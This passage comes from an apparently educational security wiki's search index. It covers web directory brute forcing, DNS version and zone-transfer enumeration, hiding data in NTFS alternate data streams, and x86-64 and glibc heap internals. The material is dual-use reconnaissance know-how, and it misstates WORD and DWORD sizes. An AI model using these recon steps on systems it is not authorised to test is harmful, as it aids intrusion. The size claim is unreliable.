Depending on the response code the server returns, one can determine which routes are publicly-accessible, which ones require some sort of authentication and which ones simply do not exist on the server. The basic syntax for feroxbuster is the following: feroxbuster -u -w The 200's (green) codes indicate a file or directory that is publicly accessible. The 300's (orange) code numbers represent a web page which redirects to another page. This may be because we are currently not authenticated as a user who can view said page. The 400's (red) codes represent client errors. More specifically, 404 means that the web page does not exist on the server and 403 means that the page does exist, but we are not allowed to access it. Note SecLists is a large collection of wordlists whose contents range from common URLs and file names to usernames and passwords. In contrast to other directory brute forcing tools, feroxbuster is recursive by default. If it finds a directory, it is going to begin brute forcing its contents as well. This is useful because it generates a comprehensive list of most, if not all, files and directories on the server. Nevertheless, this does usually take a lot of time. This behaviour can be disabled by using the --no-recursion flag. feroxbuster also supports appending filename extensions by using the -x command-line argument. This can come in handy, for example, when one has discovered the primary language / framework used on the server (PHP, ASPX, etc.).","breadcrumbs":"Reconnaissance » Enumeration » Web Server Enumeration (80, 443) » Directory Brute Force","id":"27","title":"Directory Brute Force"},"270":{"body":"ADSs cannot be manipulated via Windows Explorer and so the command-line is needed. File operations with alternate data streams on the command-line work the same, but you will need to use the : format to refer to the stream you want to manipulate. 
For example, echo hello > file.txt\necho secret > file.txt:hidden Windows Explorer is completely oblivious to the alternate data stream. The command-line, however, is not: Additionally, the dir /R command can be used to list alternate data streams for files in a directory: A more sophisticated tool for managing ADSs, called Streams comes with the SysInternals suite. It can be used with the -s option to recursively show all streams for the files in a directory: The number next to the stream name is the size of the data stored in the stream. Streams can also be used to delete all streams from a file with the -d option:","breadcrumbs":"System Internals » Windows » File System » Working with ADSs","id":"270","title":"Working with ADSs"},"271":{"body":"","breadcrumbs":"Reverse Engineering » Reverse Engineering","id":"271","title":"Reverse Engineering"},"272":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » Program Anatomy","id":"272","title":"Program Anatomy"},"273":{"body":"The stack is a place in memory. It's a Last-In-First-Out (LIFO) data structure, meaning that the last element to be added will be the first to get removed. Each process has access to its own stack which isn't bigger than a few megabytes. Adding data to the stack is called pushing onto the stack, whilst removing data is called popping off the stack. Although the location of the added or removed data is fixed (it's always to or from the top of the stack), existing data can still be read or written to arbitrarily. A special register is used for keeping track of the top of the stack - the stack pointer or rsp. When pushing data, the stack pointer diminishes , and when removing data, the stack pointer augments . This is because the stack grows from higher to lower memory addresses.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Stack » The Stack","id":"273","title":"The Stack"},"274":{"body":"When a function is invoked, a stack frame is constructed. 
First, the caller places any arguments which do not fit into the argument registers on the stack (on x86-64 System V the first six integer arguments travel in rdi, rsi, rdx, rcx, r8 and r9, so in the example below only g and h end up on the stack), then the call instruction pushes the return address. Following this, the callee saves the value of a special register known as the base pointer (rbp) onto the stack and updates rbp to point to the location on the stack where the old base pointer was saved. From then on, the stack pointer is used for allocating local data inside the function and the base pointer is used for accessing this data. long func(long a, long b, long c, long d, long e, long f, long g, long h)\n{ long x = a * b * c * d * e * f * g * h; long y = a + b + c + d + e + f + g + h; long z = otherFunc(x, y); return z + 20;\n} Sometimes, the base pointer might be completely absent in optimised programs (-fomit-frame-pointer) because compilers are good enough at keeping track of offsets directly from the stack pointer.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Stack » Stack Frames","id":"274","title":"Stack Frames"},"275":{"body":"Each program is comprised of a set of instructions which tell the CPU what operations it needs to perform. Different CPU architectures make use of different instruction sets, however, all of them boil down to two things - an operation code (opcode) and optional data that the instruction operates with. 
These are all represented using bits - 1s and 0s.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » Instructions","id":"275","title":"Instructions"},"276":{"body":"Copies the value of the second operand into the first (here, the contents of rdx into rax); the source is left unchanged: mov rax, rdx","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » mov","id":"276","title":"mov"},"277":{"body":"Load effective address - this instruction calculates the address denoted by its second operand and stores it in its first operand without reading memory at that address: lea rdx, [rax+0x10] This will store the value rax+0x10 in rdx. Compilers also use lea as a cheap way of computing sums and products, so it does not necessarily indicate that a pointer is involved.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » lea","id":"277","title":"lea"},"278":{"body":"This instruction adds its operands and stores the result in its first operand: add rax, rdx","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » add","id":"278","title":"add"},"279":{"body":"This instruction subtracts the second operand from the first and stores the result in its first operand: sub rax, 0x9","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » sub","id":"279","title":"sub"},"28":{"body":"The BIND software is the most commonly used name server software, which supports CHAOSNET queries. This can be used to query the name server for its software type and version. We are no longer querying the domain name system but are instead requesting information about the BIND instance. Our queries will still take the form of domain names - using .bind as the top-level domain. The results from such a query are returned as TXT records. 
Use the following syntax for querying BIND with the CHAOS class: dig @ ┌──(cr0mll@kali)-[~]-[]\n└─$ dig @192.168.129.138 chaos version.bind txt ; <<>> DiG 9.16.15-Debian <<>> @192.168.129.138 chaos version.bind txt\n; (1 server found)\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38138\n;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1\n;; WARNING: recursion requested but not available ;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;version.bind. CH TXT ;; ANSWER SECTION:\nversion.bind. 0 CH TXT \"9.8.1\" ;; AUTHORITY SECTION:\nversion.bind. 0 CH NS version.bind. ;; Query time: 0 msec\n;; SERVER: 192.168.129.138#53(192.168.129.138)\n;; WHEN: Tue Sep 14 16:24:35 EEST 2021\n;; MSG SIZE rcvd: 73 Looking at the answer section, we see that this name server is running BIND 9.8.1. Bear in mind that the administrator can hide or replace this string with the version option in named.conf, so treat it as a hint rather than proof. Other chaos records you can request are hostname.bind, authors.bind, and server-id.bind.","breadcrumbs":"Reconnaissance » Enumeration » DNS Server Enumeration (53) » Enumerating BIND servers with CHAOS","id":"28","title":"Enumerating BIND servers with CHAOS"},"280":{"body":"It performs a bitwise XOR on its operands and stores the result in the first operand: xor rdx, rax The and and or instructions work the same way, but perform a bitwise AND and a bitwise OR operation, respectively. A register XORed with itself (xor eax, eax) is the idiomatic way of zeroing it, so this pattern appears constantly in compiled code and in shellcode.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » xor","id":"280","title":"xor"},"281":{"body":"Decreases the stack pointer (grows the stack) by 8 (4 on x86) bytes and stores the contents of its operand on the stack: push rax","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » push","id":"281","title":"push"},"282":{"body":"Loads the value at the top of the stack into its operand and then increases the stack pointer (shrinks the stack) by 8 (4 on x86) bytes: pop rax","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » pop","id":"282","title":"pop"},"283":{"body":"Jumps to the 
address specified - used for redirecting code execution: jmp 0x6A2B10","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » jmp","id":"283","title":"jmp"},"284":{"body":"Used for invoking procedures. It pushes the return address (the address of the instruction following the call) onto the stack and then jumps to the specified address. It does not save the base pointer - that is the job of the callee's prologue (push rbp; mov rbp, rsp). After the function is finished, a ret instruction pops the return address off the stack and continues execution from there; the base pointer is restored by the callee's epilogue (leave or pop rbp) immediately before the ret. This is why overwriting the saved return address on the stack redirects execution.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » call","id":"284","title":"call"},"285":{"body":"It subtracts the second operand from the first, discards the result and sets the flags according to it: cmp rax, rdx Treating the operands as unsigned: If rax < rdx, the zero flag is set to 0 and the carry flag is set to 1. If rax > rdx, the zero flag is set to 0 and the carry flag is set to 0. If rax = rdx, the zero flag is set to 1 and the carry flag is set to 0. Signed comparisons are decided by the sign and overflow flags instead, so the conditional jump which follows (ja/jb versus jg/jl) tells you whether the compiler treated the values as unsigned or signed.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » cmp","id":"285","title":"cmp"},"286":{"body":"jump-if-zero and jump-if-not-zero execute depending on the state of the zero flag.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » jz / jnz","id":"286","title":"jz / jnz"},"287":{"body":"The heap is a memory region which allows for dynamic allocation. Memory on the heap is allotted at runtime and programs are permitted to freely request additional heap memory whenever it is required. It is the program's job to free every allocation exactly once. Failure to do so can result in undefined behaviour. In C, heap memory is usually allocated through the use of malloc and, whenever the program is finished with this data, the free function must be invoked in order to hand the chunk back to the allocator so that it can be reused by later allocations (the allocator only occasionally returns memory to the operating system). 
Heap memory can also be allocated by using malloc-compatible heap functions like calloc, realloc and memalign or in C++ using the corresponding new and new[] operators as well as their deallocation counterparts delete and delete[].","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » The Heap","id":"287","title":"The Heap"},"288":{"body":"Do not read or write to a pointer returned by malloc after that pointer has been passed to free. -> Can lead to use after free vulnerabilities. Do not use or leak uninitialised information in a heap allocation. -> Can lead to information leaks or uninitialised data vulnerabilities. Do not read or write bytes after the end of an allocation. -> Can lead to heap overflow and out-of-bounds read vulnerabilities. Do not pass a pointer that originated from malloc to free more than once. -> Can lead to double free vulnerabilities. Do not write bytes before the beginning of the allocation. -> Can lead to heap underflow vulnerabilities. Do not pass a pointer that did not originate from malloc to free. -> Can lead to invalid free vulnerabilities. Do not use a pointer returned by malloc before checking if the function returned NULL. -> Can lead to null-dereference bugs and sometimes arbitrary write vulnerabilities. The implementation of the heap is platform specific; the sections below describe the glibc heap (ptmalloc).","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Heap Rules","id":"288","title":"Heap Rules"},"289":{"body":"The heap grows from lower to higher addresses.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » The GLIBC Heap","id":"289","title":"The GLIBC Heap"},"29":{"body":"A Zone transfer request provides the means for copying a DNS zone file from one name server to another. This, however, only works over TCP. By doing this, you can obtain all the records of a DNS server for a particular zone. 
This is done through the AXFR request type: dig @ AXFR ┌──(cr0mll0@kali)-[~]-[]\n└─$ dig @192.168.129.138 AXFR nsa.gov ; <<>> DiG 9.16.15-Debian <<>> @192.168.129.138 AXFR nsa.gov\n; (1 server found)\n;; global options: +cmd\nnsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600\nnsa.gov. 3600 IN NS ns1.nsa.gov.\nnsa.gov. 3600 IN NS ns2.nsa.gov.\nnsa.gov. 3600 IN MX 10 mail1.nsa.gov.\nnsa.gov. 3600 IN MX 20 mail2.nsa.gov.\nfedora.nsa.gov. 3600 IN TXT \"The black sparrow password\"\nfedora.nsa.gov. 3600 IN AAAA fd7f:bad6:99f2::1337\nfedora.nsa.gov. 3600 IN A 10.1.0.80\nfirewall.nsa.gov. 3600 IN A 10.1.0.105\nfw.nsa.gov. 3600 IN A 10.1.0.102\nmail1.nsa.gov. 3600 IN TXT \"v=spf1 a mx ip4:10.1.0.25 ~all\"\nmail1.nsa.gov. 3600 IN A 10.1.0.25\nmail2.nsa.gov. 3600 IN TXT \"v=spf1 a mx ip4:10.1.0.26 ~all\"\nmail2.nsa.gov. 3600 IN A 10.1.0.26\nns1.nsa.gov. 3600 IN A 10.1.0.50\nns2.nsa.gov. 3600 IN A 10.1.0.51\nprism.nsa.gov. 3600 IN A 172.16.40.1\nprism6.nsa.gov. 3600 IN AAAA ::1\nsigint.nsa.gov. 3600 IN A 10.1.0.101\nsnowden.nsa.gov. 3600 IN A 172.16.40.1\nvpn.nsa.gov. 3600 IN A 10.1.0.103\nweb.nsa.gov. 3600 IN CNAME fedora.nsa.gov.\nwebmail.nsa.gov. 3600 IN A 10.1.0.104\nwww.nsa.gov. 3600 IN CNAME fedora.nsa.gov.\nxkeyscore.nsa.gov. 3600 IN TXT \"knock twice to enter\"\nxkeyscore.nsa.gov. 3600 IN A 10.1.0.100\nnsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600\n;; Query time: 4 msec\n;; SERVER: 192.168.129.138#53(192.168.129.138)\n;; WHEN: Fri Sep 17 22:38:47 EEST 2021\n;; XFR size: 27 records (messages 1, bytes 709)","breadcrumbs":"Reconnaissance » Enumeration » DNS Server Enumeration (53) » DNS Zone Transfer","id":"29","title":"DNS Zone Transfer"},"290":{"body":"The heap manager allocates resources in the so-called chunks . These chunks are stored adjacent to each other and must be 8-byte aligned or 16-byte aligned on 32-bit and 64-bit systems respectively. 
In addition to this padding, each chunk contains metadata which provides information about the chunk itself. Consequently, issuing a request for memory allocation on the heap actually allocates more bytes than originally requested. It is important to distinguish between in-use chunks and free (or previously allocated) chunks, since they have disparate memory layouts. The following diagram outlines a chunk that is in use: The size field contains the chunk size in bytes. Since chunk sizes are always a multiple of the alignment, the lowest three bits of this field are free and are used as flags: A (0x04) - NON_MAIN_ARENA. If this bit is 0, the chunk belongs to the main arena and its heap. If this bit is 1, the chunk belongs to a non-main (thread) arena and the heap_info header of the heap it lives in can be computed from the chunk's address. M (0x02) - IS_MMAPPED. If this bit is set, then the chunk was obtained directly via mmap and isn't part of any arena's heap. Typically used for large allocations. P (0x01) - PREV_INUSE. If this bit is set, then the previous chunk is in use and must not be considered for coalescing; only when it is clear is the prev_size field at the start of the chunk valid and the previous chunk free. A free chunk looks a bit different: The size and AMP fields carry on the same meaning as those in chunks that are in use. Free chunks are organised in singly or doubly linked lists called bins . The fwd and bck pointers are utilised in the implementation of those linked lists. Different types of bins exist for different purposes. The top of the heap is by convention called the top chunk .","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Chunks","id":"290","title":"Chunks"},"291":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Memory Allocation on the Heap","id":"291","title":"Memory Allocation on the Heap"},"292":{"body":"When an application requests heap memory, the heap manager traverses the bins in search of a free chunk that is large enough to service the request. 
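The chunk layout described above, as an added example (not code from the original notes): it decodes the size field of an in-use glibc chunk into the chunk size and its A/M/P bits, reproduces glibc's request2size() rounding, and reads the live size field sitting eight bytes before each pointer that malloc returns. The constants are those of 64-bit glibc; reading the header of a live allocation only makes sense on glibc, other allocators will print garbage there.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example (not part of the original notes). Layout constants are those
 * of 64-bit glibc; on 32-bit glibc SIZE_SZ is 4, MALLOC_ALIGNMENT 8 and
 * MIN_CHUNK_SIZE 16. */
#define SIZE_SZ          8UL
#define MALLOC_ALIGNMENT 16UL
#define MIN_CHUNK_SIZE   32UL

#define PREV_INUSE     0x1UL   /* P */
#define IS_MMAPPED     0x2UL   /* M */
#define NON_MAIN_ARENA 0x4UL   /* A */
#define SIZE_BITS      (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

struct chunk_hdr {
    size_t size;        /* chunk size with the three flag bits masked off */
    int prev_inuse;     /* P: previous chunk is in use, its prev_size field is not valid */
    int is_mmapped;     /* M: chunk was mmap()ed and lives outside any arena */
    int non_main_arena; /* A: chunk belongs to a thread arena, not the main one */
};

/* Split a raw size-field value into the chunk size and its flag bits. */
struct chunk_hdr decode_size_field(size_t raw)
{
    struct chunk_hdr h;
    h.size = raw & ~SIZE_BITS;
    h.prev_inuse = (raw & PREV_INUSE) != 0;
    h.is_mmapped = (raw & IS_MMAPPED) != 0;
    h.non_main_arena = (raw & NON_MAIN_ARENA) != 0;
    return h;
}

/* glibc's request2size(): add room for the size field, round up to the
 * alignment and never go below the minimum chunk size. Only one SIZE_SZ is
 * added because the prev_size field of the *next* chunk doubles as the last
 * eight bytes of this chunk's user data while this chunk is in use. */
size_t request2size(size_t req)
{
    if (req + SIZE_SZ + MALLOC_ALIGNMENT - 1 < MIN_CHUNK_SIZE)
        return MIN_CHUNK_SIZE;
    return (req + SIZE_SZ + MALLOC_ALIGNMENT - 1) & ~(MALLOC_ALIGNMENT - 1);
}

/* Read the raw size field that sits SIZE_SZ bytes before a live allocation. */
size_t read_size_field(const void *user_ptr)
{
    size_t raw;
    memcpy(&raw, (const char *)user_ptr - SIZE_SZ, sizeof raw);
    return raw;
}

int main(void)
{
    /* Request sizes chosen to show rounding, the minimum chunk and an
     * mmap()ed chunk: 200000 bytes exceeds the default 128 KiB threshold, so
     * M is set and the size is rounded to a page rather than to 16 bytes. */
    size_t reqs[] = { 1, 24, 25, 100, 1024, 200000 };

    for (size_t i = 0; i < sizeof reqs / sizeof reqs[0]; i++) {
        char *p = malloc(reqs[i]);
        if (p == NULL)
            return 1;
        struct chunk_hdr h = decode_size_field(read_size_field(p));
        printf("malloc(%6zu) -> chunk size %7zu (request2size says %7zu)  A=%d M=%d P=%d\n",
               reqs[i], h.size, request2size(reqs[i]),
               h.non_main_arena, h.is_mmapped, h.prev_inuse);
        free(p);
    }
    return 0;
}
```

Compile with `gcc -O0 chunks.c` and compare the two size columns: they agree for arena chunks and diverge only for the mmap()ed one, where the M bit is the tell. Note that the P bit of a fresh chunk is almost always 1, because the chunk before it (or the previous allocation in this loop) is still in use or has gone to the tcache rather than being coalesced.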
If such a chunk is found, it is removed from the bin, turned into an in-use chunk and then a pointer is returned to the user data section of the chunk.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating from Free Chunks","id":"292","title":"Allocating from Free Chunks"},"293":{"body":"If no free chunk is found that can service the request, the heap manager must carve an entirely new chunk out of the top of the heap. To achieve this, it first needs to ascertain whether there is enough space in the top chunk to hold the new chunk.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating from the Top Chunk","id":"293","title":"Allocating from the Top Chunk"},"294":{"body":"Once the free space at the top of the heap is used up, the heap manager will have to ask the kernel for additional memory. On the initial heap, the heap manager asks the kernel to allocate more memory at the end of the heap by calling sbrk. On most Linux-based systems this function internally uses a system call called brk. Eventually, the heap will grow to its maximum size, since expanding it any further would cause it to intrude on other sections of the process' address space. In this case, the heap manager will resort to using mmap to map new memory for heap expansions. If mmap also fails, then the process is unable to allocate more memory and malloc returns NULL.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Requesting Additional Memory at the Top of the Heap from the Kernel","id":"294","title":"Requesting Additional Memory at the Top of the Heap from the Kernel"},"295":{"body":"Large chunks get treated differently in their allocation. These are allocated off-heap through the direct use of mmap calls and this is reflected in the chunk's metadata by setting the M bit to 1. 
When such allocations are later returned to the heap manager via a call to free, the heap manager releases the entire mmap-ed region back to the system via munmap. Different platforms have different default thresholds for what counts as a large chunk and what doesn't; on glibc the default is 128 KiB (M_MMAP_THRESHOLD) and it is raised dynamically whenever an mmap-ed chunk is freed, so the same request size may or may not be mmap-ed depending on the allocation history.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating Large Chunks","id":"295","title":"Allocating Large Chunks"},"296":{"body":"Multithreaded applications require that internal data structures on the heap are protected from race conditions. In the past, the heap manager availed itself of a global mutex before every heap operation, however, significant performance issues arose as a result. Consequently, the concept of \"arenas\" was introduced. Each arena consists of a separate heap which manages its own chunk allocation and bins. Although each arena still utilises a mutex for its internal operations, different threads can make use of different arenas to avoid having to wait for each other. The initial (main) arena consists of a single heap and for single-threaded applications it is the only arena that will ever exist. However, as more threads are spawned, new arenas are allocated and attached to them. Once all available arenas are being utilised by threads, the heap manager will commence creating new ones until a limit - 2 * Number of CPU cores for 32-bit and 8 * Number of CPU cores for 64-bit processes - is reached. Afterwards, multiple threads will be forced to share the same arena.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Arenas","id":"296","title":"Arenas"},"297":{"body":"Free chunks are organised in the so-called bins which are essentially linked lists. For performance reasons different types of bins exist. There are 62 small bins, 63 large bins, 1 unsorted bin, 10 fast bins and 64 tcache bins per thread. The last two appeared later and are built on top of the first three. 
Pointers to the small, large, and unsorted bins are stored in the same array in the heap manager: BIN[0] -> invalid (unused)\nBIN[1] -> unsorted bin\nBIN[2] to BIN[63] -> small bins\nBIN[64] to BIN[126] -> large bins","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Bins","id":"297","title":"Bins"},"298":{"body":"There are 62 small bins and each of them stores chunks of a fixed size. Each chunk with a size less than 512 bytes on 32-bit systems and 1024 bytes on 64-bit systems has a corresponding small bin. Small bins are sorted by default due to the fixed size of their elements, and insertion and removal of entries in these bins is incredibly fast.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Small Bins","id":"298","title":"Small Bins"},"299":{"body":"There are 63 large bins and they resemble small bins in their operation but store chunks of different sizes. Consequently, insertion and removal of entries in these lists are slower, since the entire bin has to be traversed in order to find a suitable chunk. A different number of bins is allocated for each chunk size range. The chunk size range begins at 64 bytes - there are 32 bins all of which shift the range of chunk sizes they store by 64 from the previous bin. Following are 16 bins which shift the range by 512 bytes and so on. In essence: Bin 1 -> stores chunks of sizes 512 - 568 bytes; Bin 2 -> stores chunks of sizes 576 - 632 bytes; ... 
There are: Number of Bins Spacing between Bins 32 64 16 512 8 4096 4 32768 2 262144 1 Remaining chunk sizes","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Large Bins","id":"299","title":"Large Bins"},"3":{"body":"Any major changes outside of the eight category folders in the Notes/ directory are not permitted and will be rejected.","breadcrumbs":"Cyberclopaedia » Contributing » Out-of-Scope","id":"3","title":"Out-of-Scope"},"30":{"body":"The File Transfer Protocol (FTP) is a common protocol which you may find during a penetration test. It is a TCP-based protocol and runs on port 21. Luckily, its enumeration is simple and rather straightforward. You can use the ftp command if you have credentials: ftp You can then proceed with typical navigation commands like dir, cd, pwd, get and send to navigate and interact with the remote file system. If you don't have credentials, you can try with the usernames guest, anonymous, or ftp and an empty password in order to test for anonymous login.","breadcrumbs":"Reconnaissance » Enumeration » FTP Enumeration (21) » Introduction","id":"30","title":"Introduction"},"300":{"body":"There is a single unsorted bin. Chunks from small and large bins end up directly in this bin after they are freed. The point of the unsorted bin is to speed up allocations by serving as a sort of cache. When malloc is invoked, it will first traverse this bin and see if it can immediately service the request. If not, it will move onto the small or large bins respectively.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Unsorted Bins","id":"300","title":"Unsorted Bins"},"301":{"body":"Fast bins provide a further optimisation layer. Recently released small chunks are put in fast bins and are not initially merged with their neighbours. This allows for them to be repurposed forthwith, should a malloc request for that chunk size come very soon after the chunk's release. 
There are 10 fast bins, covering chunks of size 16, 24, 32, 40, 48, 56, 64, 72, 80, and 88 bytes plus chunk metadata. Fast bins are implemented as singly linked lists and insertions and removals of entries in them are really fast. Periodically, the heap manager consolidates the heap - chunks in the fast bins are merged with the abutting chunks and inserted into the unsorted bin. This consolidation occurs when a malloc request is issued for a size that is larger than a fast bin can serve (chunks over 512 bytes on 32-bit systems and over 1024 bytes on 64-bit systems), when freeing a chunk larger than 64KB or when malloc_trim or mallopt is invoked.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Fast Bins","id":"301","title":"Fast Bins"},"302":{"body":"A new caching mechanism called tcache (thread local caching) was introduced in glibc version 2.26 back in 2017. The tcache stores bins of fixed size small chunks as singly linked lists. Similarly to a fast bin, chunks in tcache bins aren't merged with adjoining chunks. By default, there are 64 tcache bins, each containing a maximum of 7 same-sized chunks. The possible chunk sizes range from 12 to 516 bytes on 32-bit systems and from 24 to 1032 bytes on 64-bit systems. When a chunk is freed, the heap manager checks if the chunk fits into a tcache bin corresponding to that chunk size. If the tcache bin for this size is full or the chunk is simply too big to fit into a tcache bin, the heap manager obtains a lock on the arena and proceeds to comb through other bins in order to find a suitable one for the chunk. When malloc needs to service a request, it first checks the tcache for a chunk of the requested size that is available and should such a chunk be found, malloc will return it without ever having to obtain a lock. If the chunk is too big, malloc continues as before. A slightly different strategy is employed if the requested chunk size does have a corresponding tcache bin, but that bin is simply full. 
In that case, malloc obtains a lock and promotes as many heap chunks of the requested size to tcache chunks, up to the tcache bin limit of 7. Subsequently, the last matching chunk is returned.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » TCache Bins","id":"302","title":"TCache Bins"},"303":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » malloc and free","id":"303","title":"malloc and free"},"304":{"body":"First, every allocation exists as a memory chunk which is aligned and contains metadata as well as the region the programmer wants. When a programmer requests memory from the heap, the heap manager first works out what chunk size the allocation request corresponds to, and then searches for the memory in the following order: If the size corresponds with a tcache bin and there is a tcache chunk available, return that immediately. If the request is huge, allocate a chunk off-heap via mmap. Otherwise obtain the arena heap lock and then perform the following steps, in order: Try the fastbin/smallbin recycling strategy If a corresponding fast bin exists, try and find a chunk from there (and also opportunistically prefill the tcache with entries from the fast bin). Otherwise, if a corresponding small bin exists, allocate from there (opportunistically prefilling the tcache as we go). Resolve all the deferred frees - Otherwise merge the entries in the fast bins and move their consolidated chunks to the unsorted bin. - Go through each entry in the unsorted bin. If it is suitable, return it. Otherwise, put the unsorted entry on its corresponding small/large bin as we go (possibly promoting small entries to the tcache). Default back to the basic recycling strategy If the chunk size corresponds with a large bin, search the corresponding large bin now. Create a new chunk from scratch Otherwise, there are no chunks available, so try and get a chunk from the top of the heap. 
If the top of the heap is not big enough, extend it using sbrk. If the top of the heap can’t be extended because we ran into something else in the address space, create a discontinuous extension using mmap and allocate from there If all else fails, return NULL.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocation","id":"304","title":"Allocation"},"305":{"body":"If the pointer is NULL, do nothing. Otherwise, convert the pointer back to a chunk by subtracting the size of the chunk metadata. Perform a few sanity checks on the chunk, and abort if the sanity checks fail. If the chunk fits into a tcache bin, store it there. If the chunk has the M bit set, give it back to the operating system via munmap. Otherwise we obtain the arena heap lock and then: If the chunk fits into a fastbin, put it on the corresponding fastbin. If the chunk size is greater than 64KB, consolidate the fastbins immediately and put the resulting merged chunks on the unsorted bin. Merge the chunk backwards and forwards with neighboring freed chunks in the small, large, and unsorted bins. If the resulting chunk lies at the top of the heap, merge it into the top chunk. Otherwise store it in the unsorted bin.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Deallocation","id":"305","title":"Deallocation"},"306":{"body":"Registers are value containers which reside on the CPU and not in RAM. They are small in size and some have special purposes. You may store both addresses and values in registers and depending on the instruction used the data inside will be interpreted in a different way - this is commonly called an addressing mode . 
In x86 Intel assembly (i386), the registers are 32 bits (4 bytes) in size and some of them are reserved: ebp - the base pointer, points to the bottom of the current stack frame esp - the stack pointer, points to the top of the current stack frame eip - the instruction pointer, points to the next instruction to be executed The other registers are general purpose registers and can be used for anything you like: eax, ebx, ecx, edx, esi, edi. x64 AMD assembly (amd64) extends these 32-bit registers to 64-bit ones and denotes these new versions by replacing the initial e with an r: rbp, rsp, rip, rax, ... It is important to note that these are not different registers - eax and rax refer to the same space on the CPU, however, eax only provides access to the lower 32 bits of the 64-bit register. You can also get access to the lower 16 and 8 bits of the register using different names: 8 Byte Register Lower 4 Bytes Lower 2 Bytes Lower Byte rbp ebp bp bpl rsp esp sp spl rip eip rax eax ax al rbx ebx bx bl rcx ecx cx cl rdx edx dx dl rsi esi si sil rdi edi di dil r8 r8d r8w r8b r9 r9d r9w r9b r10 r10d r10w r10b r11 r11d r11w r11b r12 r12d r12w r12b r13 r13d r13w r13b r14 r14d r14w r14b r15 r15d r15w r15b Each row contains names which refer to different parts of the same register. Note, you cannot access the lower 16 or 8 bits of the instruction pointer. 
You might sometimes see WORD or DWORD being used in a similar context - WORD means 4 bytes and DWORD means 8 bytes.","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Registers","id":"306","title":"Registers"},"307":{"body":"Under x64 Linux, function arguments are passed via registers: rdi: First Argument\nrsi: Second Argument\nrdx: Third Argument\nrcx: Fourth Argument\nr8: Fifth Argument\nr9: Sixth Argument The return value is stored in rax (eax on 32-bit machines).","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Register Use in x64 Linux","id":"307","title":"Register Use in x64 Linux"},"308":{"body":"Register dereferencing occurs when the value of the register is treated as an address to the actual data to be used, rather than the data itself. This means that addresses can be stored in registers and used later - this is useful when dealing with large data sizes. For example, mov rax, [rdx] will check the value inside rdx and treat it as an address - it will go to the location where this address points and get its data from there. It will then move this data into rax. If we hadn't used [], it would have treated the address in rdx simply as a value and moved it directly into rax.","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Register Dereferencing","id":"308","title":"Register Dereferencing"},"309":{"body":"Ghidra is an open-source framework for reverse engineering developed by the NSA. 
It groups binaries into projects which can be shared amongst multiple people.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Introduction","id":"309","title":"Introduction"},"31":{"body":"You will need working knowledge of SNMP in order to follow through.","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » Introduction","id":"31","title":"Introduction"},"310":{"body":"To install Ghidra, you can run sudo apt install ghidra.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Installation","id":"310","title":"Installation"},"311":{"body":"File -> New Project Non-Shared Project Select Directory Name the Project","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Creating a Project and Loading a Binary » Creating a Project","id":"311","title":"Creating a Project"},"312":{"body":"File -> Import File Select the binary you want to import Ghidra will automatically detect certain information about the file After importing, Ghidra will display an Import Results Summary containing information about the binary","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Creating a Project and Loading a Binary » Loading a Binary","id":"312","title":"Loading a Binary"},"313":{"body":"Double-clicking on a program will open it in the Code Browser. A prompt will appear for analysing the binary. Ghidra will attempt to create and label functions, as well as identify any cross-references in memory. Once the binary has been analysed you will be presented with the following screen:","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Initial Analysis » Initial Analysis","id":"313","title":"Initial Analysis"},"314":{"body":"radare2 is an open-source framework for reverse engineering. The framework includes multiple tools which all work in tandem in order to aid in the analysis of binary files. 
